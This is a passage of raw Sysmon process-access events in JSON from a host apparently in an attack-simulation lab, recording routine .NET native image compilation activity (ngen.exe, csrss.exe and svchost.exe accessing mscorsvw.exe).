07:00:53.621","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010DA3D0B00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7420,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.668\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.668","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7421,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.668\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12F1-5F25-0000-001032970A00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.668","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12F1-5F25-0000-001032970A00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7422,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.683\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010EF410B00}\r\nTargetProcessId: 4400\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.683","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010EF410B00}","TargetProcessId":"4400","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7423,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.808\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00109B450B00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.808","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00109B450B00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7424,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.808\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00109B450B00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.808","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00109B450B00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7425,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-00109B450B00}\r\nTargetProcessId: 2200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-00109B450B00}","TargetProcessId":"2200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7426,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.918\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-0010E4480B00}\r\nTargetProcessId: 2984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.918","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-0010E4480B00}","TargetProcessId":"2984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET